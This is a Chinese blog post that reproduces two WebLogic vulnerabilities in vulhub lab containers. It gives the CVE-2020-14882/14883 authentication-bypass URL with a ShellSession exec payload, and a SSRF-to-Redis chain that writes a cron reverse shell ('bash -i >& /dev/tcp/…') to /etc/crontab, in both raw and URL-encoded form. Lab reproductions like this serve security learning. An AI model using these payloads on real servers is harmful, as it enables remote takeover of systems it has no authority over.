weblogic管理控制台未授权远程命令执行漏洞和weblogic SSRF漏洞复现

最新推荐文章于 2023-09-11 15:04:11 发布
最新推荐文章于 2023-09-11 15:04:11 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48739941/article/details/124330906
版权

1 weblogic管理控制台未授权远程命令执行漏洞复现

(1)cd CVE-2020-14882 切换目录。

(2)docker-compose up -d 启动。

(3)访问http://192.168.241.128:7001/console

(4)http://192.168.241.128:7001/css/%252e%252e%252fconsole.portal  绕过漏洞,未授权访问后台管理页面。

(5)burpsuite抓包。

(6)send to repeater,构造URL:

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/EDI');")

点击go。

(6)进入容器:docker exec -it 101 /bin/bash。

(7)切换目录:cd /

cd tmp

查看:ls,创建成功。

2.weblogic SSRF漏洞复现

(1)切换目录:cd vulhub  cd weblogic  cd ssrf

(2)docker-compose up -d 启动。

(3)访问:http://192.168.17.128:7001/uddiexplorer/SearchPublicRegistries.jsp

(4)burpsuite抓包。

(5)send to repeater ,这里的operator是可控的,输入127.0.0.1:7001,点击go。

(6)注入HTTP头,利用Redis反弹shell。通过SSRF探测内网中的Redis的服务器,输入: 172.18.0.2:6379。

(7)将反弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.233.139/1234 0>&1\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

对命令进行URL编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.233.140%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

将URL编码后的字符串放在SSRF的域名后面发送。

(8) 攻击机开启监听:nc -lvp 1236,成功反弹shell.

zzz@123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现(vulhub漏洞复现) (1)weblogic管理控制台授权远程命令执行漏洞复现 (2) Weblogic SSRF漏洞漏洞复现
记录笔记
04-13 1152
weblogic管理控制台授权远程命令执行漏洞复现 Weblogic SSRF漏洞漏洞复现 虚拟机同时运行了 redis、Weblogic 两个容器 http://192.168.15.136:7001/uddiexplorer/ http://192.168.15.136:7001/uddiexplorer/SearchPublicRegistries.jsp http://192.168.15.136:7001/uddiexplorer/SearchPublicReg
文件包含漏洞
jpygx123的博客
10-25 3947
文件包含漏洞 严格来说,文件包含漏洞是“代码注入”的一种,这种攻击其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。 常见的导致文件包含(文件读取)的函数如下: PHP: include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。 require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终...
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台授权远程命令执行漏洞
god_Zeo的安全博客
11-02 5992
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
vulhub漏洞Weblogic管理控制台授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
weixin_45808483的博客
12-20 2826
WeblogicOracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以授权的任意用户身份执行命令漏洞环境
Weblogic管理控制台授权远程命令执行漏洞复现(cve-2020-14882/cve-2020-14883)
Bird&Bird
03-11 589
WeblogicOracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882和CVE-2020-14883;CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以授权的任意用户身份执行命令
Weblogic 管理控制台授权远程命令执行
maverickpig的博客
05-07 542
Weblogic 管理控制台授权远程命令执行 漏洞描述 WeblogicOracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用
再探SSRF服务器请求伪造(weblogic cve ssrf redis授权
热门推荐
Love&Share
04-26 1万+
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用:https://vulhub.org/#/docs/run/ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Jav
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
weblogicssrf漏洞修复_WebLogic SSRF 及漏洞修复
weixin_39928993的博客
01-13 829
SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本1...
中间件漏洞 | weblogic-ssrf
weixin_52116519的博客
10-22 800
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,探测内网IP及端口的开放情况,进而攻击内网中redis、fastcgi等脆弱组件。漏洞版本:weblogic 10.0.2-10.3.6。
Weblogic-SSRF漏洞复现
最新发布
hacker3062的博客
09-11 261
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,是指Web服务提供从用户指定的URL读取数据并展示功能又对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所以SSRF的一大利用是探测内网端口开放信息。
控制台报错以及解决方法
yuan_xiaoxin的博客
05-17 2871
今日D-BUG <el-form label-position="top" label-width="100px" class="demo-ruleForm" :rules="rules" :model='ruleForm' ref="ruleForm" > 这是正确写法 <el-form label-position="top" label-width="100px" class="demo-ruleFor
从云服务器 SSRF 漏洞到接管你的阿里云控制台
渗透测试研究中心
01-31 289
0x00 前言本文将以阿里云为例,对云服务中的一些攻防手法进行演示,首先利用 Terraform 进行 ECS SSRF 漏洞环境的搭建,然后通过实例中存在的 SSRF 漏洞一步步拿下该云服务账户的所有的阿里云服务权限。0x01 环境搭建本文采用 TerraformGoat 进行靶场的搭建,TerraformGoat 靶场地址:https://github.com/HuoCorp/Terrafo...
控制台常见安全问题
weixin_40973237的博客
01-31 316
控制台安全测试简介
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8262
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
复现weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,例如攻击内部应用程序或数据。为了防止此类漏洞的利用,建议管理员及时更新WebLogic服务器的补丁程序,并加强网络安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值